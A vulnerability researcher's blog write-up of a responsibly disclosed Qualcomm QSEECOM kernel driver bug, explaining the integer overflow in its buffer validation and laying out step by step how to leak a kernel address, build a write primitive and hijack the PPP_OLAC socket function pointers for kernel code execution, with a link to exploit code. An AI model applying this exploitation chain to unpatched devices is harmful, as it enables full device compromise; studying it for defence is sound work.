In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which enables arbitrary code execution within the kernel.
The vulnerability affected all devices based on Qualcomm chipsets (that is, based on the "msm" kernel) since February 2012.
I'd like to point out that I responsibly disclosed this issue to Qualcomm; they were great as usual and fixed the issue pretty quickly (see "Timeline" below). Those of you who are interested in the fix should definitely check out the link above.
Where are we at?
We're continuing our journey of getting from zero permissions to TrustZone code execution: having recently completed the task of getting to TrustZone from the Linux kernel, we are now looking for a way to gain code execution within the Linux kernel.
However, as you will see shortly, the vulnerability presented in this post requires some permissions to exploit, namely, it can be exploited from within a process called "mediaserver". This means that it still doesn't complete our journey, and so the next few blog posts will be dedicated to completing the exploit chain, by gaining code execution in mediaserver from zero permissions.
Since we would like to attack the Linux kernel, it stands to reason that we would take a look at all the drivers which are accessible to "underprivileged" Android users. First, let's take a look at all the drivers which are world accessible (under "/dev"):
After spending a while looking at each of these drivers, it became apparent that a more effective strategy would be to cast a wider net by expanding the number of drivers to be researched, even if they require some permissions in order to interact with. Then, once a vulnerability is found, we would simply need one more vulnerability in order to get from zero permissions to TrustZone.
One interesting candidate for research is the "qseecom" driver. For those of you who read the first blog post, we've already mentioned this driver before. This is the driver responsible for allowing Android code to interact with the TrustZone kernel, albeit using only a well defined set of commands.
So why is this driver interesting? For starters, it ties in well with the previous blog posts, and everybody loves continuity :) That aside, this driver has quite a large and fairly complicated implementation, which, following the previous posts, we are sufficiently qualified to understand and follow.
Most importantly, taking a look at the permissions needed to interact with the driver, reveals that we must either be running with the "system" user-ID which is a very high requirement, or we must belong to the group called "drmrpc".
However, searching for the "drmrpc" group within all the processes on the system, reveals that the following processes are members of the group:
- surfaceflinger (running with "system" user-ID)
- drmserver (running with "drm" user-ID)
- mediaserver (running with "media" user-ID)
- keystore (running with "keystore" user-ID)
But that's not all! Within the Linux kernel, each process has a flag named "dumpable", which controls whether or not the process can be attached to using ptrace. Whenever a process changes its permissions by executing "setuid" or "setgid", the flag is automatically cleared by the kernel to indicate that the process cannot be attached to.
While the "surfaceflinger" and "drmserver" processes modify their user-IDs during runtime, and by doing so protect themselves from foreign "ptrace" attachments, the "mediaserver" and "keystore" processes do not.
This is interesting since attaching to a process via "ptrace" allows full control of the process's memory, and therefore enables code execution within that process. As a result, any process running with the same user-ID as one of these two processes can take control of them and by doing so, may access the "qseecom" driver.
Summing it up, this means that in order to successfully access the "qseecom" driver, an attacker must only satisfy one of the following conditions:
- Gain execution within one of "surfaceflinger", "drmserver", "mediaserver" or "keystore"
- Run within a process with the "system", "media" or "keystore" user-ID
- Run within a process with the "drmrpc" group-ID
Before we start inspecting the driver's code, we should first recall the (mis)trust relationship between user-space and kernel-space.
Since drivers deal with user input, they must take extreme caution to never trust user supplied data, and always verify it extensively - all arguments passed in by the user should be considered by the kernel as "tainted". While this may sound obvious, it's a really important issue that is often overlooked by kernel developers.
In order to stop kernel developers from making these kinds of mistakes, some mechanisms were introduced into the kernel's code which help the compiler detect and prevent such attempts.
This is facilitated by marking variables which point to memory within the user's virtual address space as such, by using the "__user" macro. A pointer marked this way is not meant to be dereferenced directly, and static checking (for example, with the sparse tool) flags any code that does so.
Instead, whenever the kernel wishes to either read from or write to the pointer's location, it must do so using specially crafted kernel functions (such as "copy_from_user" and "copy_to_user") which make sure that the location pointed to actually resides within the user's address space (and not within any memory address belonging to the kernel).
Getting to know QSEECOM
Drivers come in many shapes and sizes, and can be interacted with using quite a wide variety of functions, each with its own pitfalls and common mistakes.
When character devices are registered within the kernel, they must provide a structure containing pointers to the device's implementation for each of the aforementioned functions, determining how it interacts with the system.
This means that an initial step in mapping out the attack surface for this driver would be to take a look at the functions registered by it:
IOCTLs are called using two arguments:
- The "command" to be executed
- The "argument" to be supplied to that function
Having said that, let's take a look at the different commands supported by the qseecom_ioctl function. At first glance, it seems as though quite a large range of commands are supported by the driver, such as:
- Sending command requests to TrustZone
- Loading QSEE TrustZone applications
- Provisioning different encryption keys
- Setting memory parameters for the client of the driver
In order to allow the user to send large requests to or receive large responses from the TrustZone kernel, the QSEECOM driver exposes an IOCTL command which enables the user to set up his "memory parameters".
In order to share a large chunk of memory with the kernel, the user first allocates a contiguous physical chunk of memory by using the "ion" driver.
We won't go into detail about the "ion" driver, but here's the gist of it - it is an Android driver which is used to allocate contiguous physical memory and expose it to the user by means of a file descriptor. After receiving a file descriptor, the user may then map it to any chosen virtual address, then use it as he pleases. This mechanism is advantageous as a means of sharing memory since anyone in possession of the file descriptor may map it to any address within their own virtual address space, independently of one another.
The "ion" driver also supports different kinds of pools from which memory can be allocated, and a wide variety of flags - for those interested, you can read much more about "ion" and how it works, here.
In the case of QSEECOM, three parameters are used to configure the user's memory parameters:
- virt_sb_base - The virtual address at which the user decided to map the ION allocated chunk
- sb_len - The length of the shared buffer used
- ifd_data_fd - The "ion" file descriptor corresponding to the allocated chunk
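To make the three parameters concrete, here is a minimal sketch of how they could be serialized before being handed to the driver. The field order and widths below are assumptions (they simply follow the order of the list above on a 32-bit target), and the helper names are hypothetical; the driver's own header is the authority on the real layout.

```python
import struct

# Assumed layout, NOT taken from the driver's header:
# uint32 virt_sb_base, uint32 sb_len, int32 ifd_data_fd (little-endian, 32-bit target).
SB_MEM_PARAM_FORMAT = "<IIi"


def pack_sb_mem_param(virt_sb_base, sb_len, ifd_data_fd):
    """Serialize the three memory parameters into the assumed byte layout."""
    return struct.pack(SB_MEM_PARAM_FORMAT, virt_sb_base, sb_len, ifd_data_fd)


def unpack_sb_mem_param(raw):
    """Inverse of pack_sb_mem_param; returns (virt_sb_base, sb_len, ifd_data_fd)."""
    return struct.unpack(SB_MEM_PARAM_FORMAT, raw)


# Example values are made up for illustration.
request = pack_sb_mem_param(virt_sb_base=0x10000000, sb_len=0x1000, ifd_data_fd=5)
```

On a real device, a buffer like this would be passed as the "argument" of the IOCTL (in Python, via `fcntl.ioctl(fd, request_code, buffer)`); the request code itself is not given in this post, so it is left out here.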
Note that four different parameters are stored here:
- The kernel-space virtual address at which the ION buffer is mapped
- The actual physical address of the ION buffer
- The user-space virtual address at which the ION buffer is mapped
- The length of the shared buffer
After going over the code for each of the different supported commands, one command in particular seemed to stick out as a prime candidate for exploitation - QSEECOM_IOCTL_SEND_MODFD_CMD_REQ.
This command is used in order to request the driver to send a command to TrustZone using user-provided buffers. As we know, any interaction of the kernel with user-provided data, let alone user-provided memory addresses, is potentially volatile.
After some boilerplate code and internal housekeeping, the actual function in charge of handling this particular IOCTL command is called - "qseecom_send_modfd_command".
The function first safely copies the IOCTL argument supplied by the user into a local structure, which looks like this:
The "cmd_req_buf" and "cmd_req_len" fields define the request buffer for the command to be sent, and similarly, "resp_buf" and "resp_len" define the response buffer to which the result should be written.
Now stop! Do you notice anything fishy in the structure above?
For starters, there are two pointers within this structure which are not marked as "tainted" in any way (not marked as "__user"), which means that the driver might mistakenly access them later on.
What comes next, however, is quite an intimidating wall of verifications which are meant to make sure that the given arguments are, in fact, valid. It seems as though Qualcomm win this round...
Or do they?
Well, let's look at each of the validations performed:
- First, the function makes sure that the request and response buffers are not NULL.
- Next, the function makes sure that both the request and response buffers are within the range of the shared buffer discussed earlier.
- Then, the function makes sure that the request buffer's length is larger than zero, and that both the request and the response size do not exceed the shared buffer's length.
- Lastly, for each file descriptor passed, the function validates that the command buffer offset does not exceed the length of the command buffer.
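The four checks listed above can be modeled in a few lines. This is a simplified sketch rather than the driver's code: the function name and argument names are hypothetical, and the strict comparison in the last check is an assumption.

```python
def validate_modfd_request(virt_sb_base, sb_len, cmd_req_buf, cmd_req_len,
                           resp_buf, resp_len, cmd_buf_offsets):
    """Return True if a request passes a simplified model of the four checks."""
    # 1. Neither the request nor the response buffer may be NULL.
    if cmd_req_buf == 0 or resp_buf == 0:
        return False
    # 2. Both buffers must start inside the registered shared buffer.
    sb_end = virt_sb_base + sb_len
    for buf in (cmd_req_buf, resp_buf):
        if buf < virt_sb_base or buf >= sb_end:
            return False
    # 3. The request must be non-empty, and neither length may exceed sb_len.
    if cmd_req_len == 0 or cmd_req_len > sb_len or resp_len > sb_len:
        return False
    # 4. Every per-descriptor offset must fall inside the request buffer
    #    (strict "<" is an assumption of this sketch).
    return all(offset < cmd_req_len for offset in cmd_buf_offsets)


# A well-behaved request against a 4 KiB shared buffer passes.
honest_ok = validate_modfd_request(0x10000000, 0x1000, 0x10000000, 0x100,
                                   0x10000800, 0x100, [0x10])
# A request buffer pointing at a kernel address is rejected.
kernel_ptr_ok = validate_modfd_request(0x10000000, 0x1000, 0xC0000000, 0x100,
                                       0x10000800, 0x100, [0x10])
```

Note that every check is expressed relative to `virt_sb_base` and `sb_len`, so the checks are only as trustworthy as those two registered values.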
After performing all these validations, the function goes on to convert the request and response buffers from user virtual addresses to kernel virtual addresses:
What comes next, however, is extremely interesting! The driver passes on the request and response buffers, which should now reside within kernel-space, to an internal function called "__qseecom_update_cmd_buf" - and therein lies the holy grail! The function actually writes data to the converted kernel-space address of the request buffer.
We'll expand more on the exact nature of the data written later on, but hopefully by now you're convinced that if we are able to bypass the verifications above while still maintaining control of the final kernel-space address of the request buffer, we would achieve a kernel write primitive, which seems quite tempting.
"Bring down this wall!"
First, let's start by mapping out the locations of the request and response buffers within the virtual address space:
Now, as we already know, when setting the memory parameters, the buffer starting at "virt_sb_base" and ending at "virt_sb_base + sb_len" must reside entirely within user-space. This is facilitated by the following check:
Also, the verifications above make sure that both the "cmd_req_buf" and "resp_buf" pointers are within the user-space virtual address range of the shared buffer.
However, what would happen if we were to map a huge shared buffer - one so large that it cannot be contained within kernel space? Well, a safe assumption might be that when we'd attempt to set the memory parameters for this buffer, the request would fail, since the kernel will not be able to map the buffer to its virtual address space.
Luckily, though, the IOCTL with which the memory parameters are set only uses the user-provided buffer length in order to verify that the user-space range of the shared buffer is accessible by the user (see the access check above). However, when it actually maps the buffer to its own address-space, it does so by simply using the ION file descriptor, without verifying that the buffer's actual length equals the one provided by the user.
This means we could allocate a small ION buffer, and pass it to QSEECOM while claiming it actually corresponds to a huge area. As long as the entire area lies within user-space and is write-accessible to the user, the driver will happily accept these parameters and store them for us.
But is this feasible? After all, we can't really allocate such a huge chunk of memory within user-space - there's just not enough physical memory to satisfy such a request. What we could do, however, is reserve this memory area by using mmap. This means that until the data is actually written to, it is not allocated, and therefore we can freely map an area of any size for the duration of the validation performed above, then unmap it once the driver is satisfied that the area is indeed writeable.
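The flaw in the registration step can be illustrated with a small model. Everything here is a sketch under stated assumptions: `USER_SPACE_LIMIT` is an assumed top of user space for a 32-bit kernel, the function names are hypothetical, and the range check ignores page permissions.

```python
# Assumed upper bound of user space on a 32-bit kernel (illustrative value).
USER_SPACE_LIMIT = 0xBF000000


def range_is_user_accessible(addr, length):
    """Simplified stand-in for the kernel's check that a range lies in user space."""
    return length > 0 and addr + length <= USER_SPACE_LIMIT


def register_shared_buffer(virt_sb_base, sb_len, ion_buffer_size):
    """Model of the flawed registration step.

    The user-supplied sb_len is range-checked and stored, but it is never
    compared against the real size of the ION buffer behind the descriptor.
    """
    if not range_is_user_accessible(virt_sb_base, sb_len):
        raise ValueError("shared buffer range is not within user space")
    return {
        "user_virt_sb_base": virt_sb_base,
        "sb_len": sb_len,                  # what the driver believes
        "mapped_bytes": ion_buffer_size,   # what is actually mapped
    }


# A 4 KiB ION buffer registered as if it were 2 GiB long.
params = register_shared_buffer(0x10000000, 0x80000000, ion_buffer_size=0x1000)
```

In this model the driver ends up believing in a shared buffer far larger than the memory actually backing it, which is the mismatch the rest of the post builds on.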
From now on, let's assume we map the fake shared buffer at the virtual address 0x10000000 and the mapping size is 0x80000000.
Recall that if the command and response buffers are deemed valid, they are converted to the corresponding kernel-space virtual addresses, then the converted request buffer is written to at the given offset. Putting it all together, we are left with the following actual write destination:
dest_addr = sb_virt - user_virt_sb_base + cmd_req_buf + cmd_buf_offset
Can you spot the mistake in the calculation above? Here it goes -
Since the kernel believes the shared buffer is huge, this means that the "cmd_req_buf" may point to any address within that range, and in our case, any address within the range [0x10000000, 0x90000000]. It also means that the "cmd_buf_offset" can be as large as 0x80000000, which is the fake size of the shared buffer.
Adding up two such huge numbers would doubtless cause an overflow in the calculation above, which means that the resulting address may not be within the kernel's shared buffer after all!
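A quick way to see the wraparound is to redo the arithmetic with explicit 32-bit masking. The value of `SB_VIRT` below is made up for illustration (the real address is unknown at this point), and the function name is hypothetical.

```python
MASK32 = 0xFFFFFFFF  # emulate 32-bit unsigned arithmetic


def kernel_write_address(sb_virt, user_virt_sb_base, cmd_req_buf, cmd_buf_offset):
    """Destination address as a 32-bit kernel would compute it."""
    return (sb_virt - user_virt_sb_base + cmd_req_buf + cmd_buf_offset) & MASK32


SB_VIRT = 0xE0000000          # hypothetical kernel address of the shared buffer
USER_VIRT_SB_BASE = 0x10000000

# Small, honest values land just inside the kernel's shared buffer.
honest = kernel_write_address(SB_VIRT, USER_VIRT_SB_BASE, 0x10000100, 0x20)

# Huge values allowed by the fake 0x80000000-byte buffer wrap around 2**32
# and land somewhere else entirely.
wrapped = kernel_write_address(SB_VIRT, USER_VIRT_SB_BASE, 0x8FFFFFF0, 0x7FFFFFF0)

print(hex(honest), hex(wrapped))
```

With these made-up numbers the wrapped destination ends up below `SB_VIRT`, that is, outside the shared buffer the checks were meant to confine us to.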
(Before you read on, you may want to try and work the needed values to exploit this on your own.)
Finding the kernel's shared buffer
As you can see in the calculation above, the location of the kernel's shared buffer is still unknown to us. This is because it is mapped during runtime, and this information is not exposed to the user in any way. However, this doesn't mean we can't find it on our own.
If we were to set the "cmd_buf_offset" to zero, that would mean that the destination write address for the kernel would be:
sb_virt - 0x10000000 + cmd_req_buf + 0x0
Now, since we know the "sb_virt" address is actually within the kernel's heap, it must be within the kernel's memory range (that is, larger than 0xC0000000), so "sb_virt - 0x10000000" is at least 0xB0000000. This means that for values of "cmd_req_buf" that are larger than (0xFFFFFFFF - 0xB0000000), the calculation above would surely overflow, resulting in a low user-space address.
This turns out to be really helpful. We can now allocate a sterile "dropzone" within the lower range of addresses in user-space, and fill it with a single known value.
Then, after we trigger the driver's write primitive, using the parameters described above, we could inspect the dropzone and find out where it has been "disturbed" - that is, where a value has been changed. Since we know only a single overflow happened in the destination address calculation, this means that we can simply reverse the calculation (and add 0xFFFFFFFF + 1) to find the original address of "sb_virt".
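Reversing the calculation is just modular arithmetic. The sketch below simulates the probe with a made-up "secret" kernel address and then recovers it from the disturbed dropzone address; the function names and example values are hypothetical.

```python
MASK32 = 0xFFFFFFFF
USER_VIRT_SB_BASE = 0x10000000


def probe_write_address(sb_virt, cmd_req_buf):
    """Where the kernel writes when cmd_buf_offset is zero (32-bit arithmetic)."""
    return (sb_virt - USER_VIRT_SB_BASE + cmd_req_buf) & MASK32


def recover_sb_virt(disturbed_addr, cmd_req_buf):
    """Invert the probe: the mask takes care of adding back 0xFFFFFFFF + 1."""
    return (disturbed_addr + USER_VIRT_SB_BASE - cmd_req_buf) & MASK32


secret_sb_virt = 0xE1234000   # unknown to the attacker; made up for this demo
cmd_req_buf = 0x50000000      # large enough to force a single overflow

disturbed = probe_write_address(secret_sb_virt, cmd_req_buf)
recovered = recover_sb_virt(disturbed, cmd_req_buf)
print(hex(disturbed), hex(recovered))
```

Here the disturbed address falls in low user space, which is why a dropzone mapped there can catch the write.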
Creating a controlled write primitive
Now that we know the exact address of "sb_virt", we are free to manipulate the arguments accordingly in order to control the destination address freely. Recall that the destination address is structured like so:
dest_addr = sb_virt - user_virt_sb_base + cmd_req_buf + cmd_buf_offset
Now let's choose the following values:
- user_virt_sb_base = 0x10000000
- cmd_req_buf + cmd_buf_offset = (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset
Substituting the variables with the values above:
dest_addr = sb_virt - 0x10000000 + (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset
dest_addr = sb_virt + (0xFFFFFFFF + 1) + wanted_offset
But since adding 0xFFFFFFFF + 1 will cause an overflow which will result in the same original value, we are therefore left with:
dest_addr = sb_virt + wanted_offset
Meaning we can easily control the destination to which the primitive will write its data, by choosing the corresponding "wanted_offset" for each destination address.
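As a sketch of how the arguments might be picked for a given target, the helper below splits the required 32-bit distance evenly between "cmd_req_buf" and "cmd_buf_offset". The even split, the function names and the example addresses are all assumptions of this illustration; any split that passes the driver's checks would do.

```python
MASK32 = 0xFFFFFFFF
USER_VIRT_SB_BASE = 0x10000000
FAKE_SB_LEN = 0x80000000


def choose_arguments(sb_virt, target_addr):
    """Pick (cmd_req_buf, cmd_buf_offset) so the 32-bit sum lands on target_addr."""
    # Distance from sb_virt to the target, modulo 2**32.
    delta = (target_addr - sb_virt) & MASK32
    # Split the distance so both values stay within the fake buffer's limits.
    cmd_req_buf = USER_VIRT_SB_BASE + delta // 2
    cmd_buf_offset = delta - delta // 2
    if cmd_buf_offset >= FAKE_SB_LEN:
        raise ValueError("target not reachable with this simple split")
    return cmd_req_buf, cmd_buf_offset


def kernel_write_address(sb_virt, cmd_req_buf, cmd_buf_offset):
    """Destination address as computed with 32-bit wraparound."""
    return (sb_virt - USER_VIRT_SB_BASE + cmd_req_buf + cmd_buf_offset) & MASK32


sb_virt = 0xE1234000   # hypothetical, as recovered from the dropzone
target = 0xC0A0B0C0    # hypothetical kernel address to overwrite

req_buf, offset = choose_arguments(sb_virt, target)
landing = kernel_write_address(sb_virt, req_buf, offset)
```

The target here lies below `sb_virt`, so the sum has to wrap around 2**32 to reach it, exactly as in the derivation above.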
Exploiting the write primitive
Now that we have a write primitive, all that's left is for us to exploit it. Fortunately, our write primitive allows us to overwrite any kernel address. However, we still cannot control the data written: going over the code of the vulnerable "__qseecom_update_cmd_buf" reveals that it writes a physical address related to the ION buffer to the target address:
With that in mind, all that's left for us is to overwrite a function pointer within the kernel with our write primitive. Since the DWORD written will correspond to an address which is within the user's virtual address space, we can simply allocate an executable code stub at that address, and redirect execution from that function stub to any other desired piece of code.
One such location containing function pointers can be found within the "pppolac_proto_ops" structure. This is the structure used within the kernel to register the function pointers used when interacting with sockets of the PPP_OLAC protocol. This structure is suitable because:
- The PPP_OLAC protocol isn't widely used, so there's no immediate need to restore the overwritten function pointer
- There are no special permissions needed in order to open a PPP_OLAC socket, other than the ability to create sockets
- The structure itself is static and is not marked as "const", so it is stored in the kernel's writeable data section and can therefore be overwritten
Putting it all together
At this point, we have the ability to execute arbitrary code within the kernel, thus completing our exploit. Here's a short recap of the steps we needed to perform:
- Open the QSEECOM driver
- Map an ION buffer
- Register faulty memory parameters which include a fake huge memory buffer
- Prepare a sterile dropzone in low user-space addresses
- Trigger the write primitive into a low user-space address
- Inspect the dropzone in order to deduce the address of "sb_virt" and the contents written in the write primitive
- Allocate a small function stub at the address which is written by the write primitive
- Trigger the write primitive in order to overwrite a function pointer within "pppolac_proto_ops"
- Open a PPP_OLAC socket and trigger a call to the overwritten function pointer
- Execute code within the kernel :)
Shortly after the patch was issued and the vulnerability was fixed, I was alerted by a friend of mine to the fact that an exploit had been developed for the vulnerability and incorporated into a popular rooting kit (giefroot), in order to achieve kernel code execution.
Luckily, the exploit for the vulnerability was quite poorly written (I've fully reverse engineered it), and so it didn't support all the range of vulnerable devices.
Now that the issue has been fixed for a while, I feel that it's okay to share the full vulnerability writeup and exploit code, since all devices with kernels compiled after November 2014 should be patched. I've also made sure to use a single symbol within the exploit, to prevent widespread usage by script-kiddies (although this constraint can easily be removed by dynamically finding the pointer mentioned above during the exploit).
I've written an exploit for this vulnerability; you can find it here.
Building the exploit actually produces a shared library, which exports a function called "execute_in_kernel". You may use it to execute any given function within the context of the kernel. Play safe!
Timeline
- 24.09.14 - Vulnerability disclosed
- 24.09.14 - Initial response from QC
- 30.09.14 - Issue triaged by QC
- 19.11.14 - QC issues notice to customers
- 27.12.14 - Issue closed, CAF advisory issued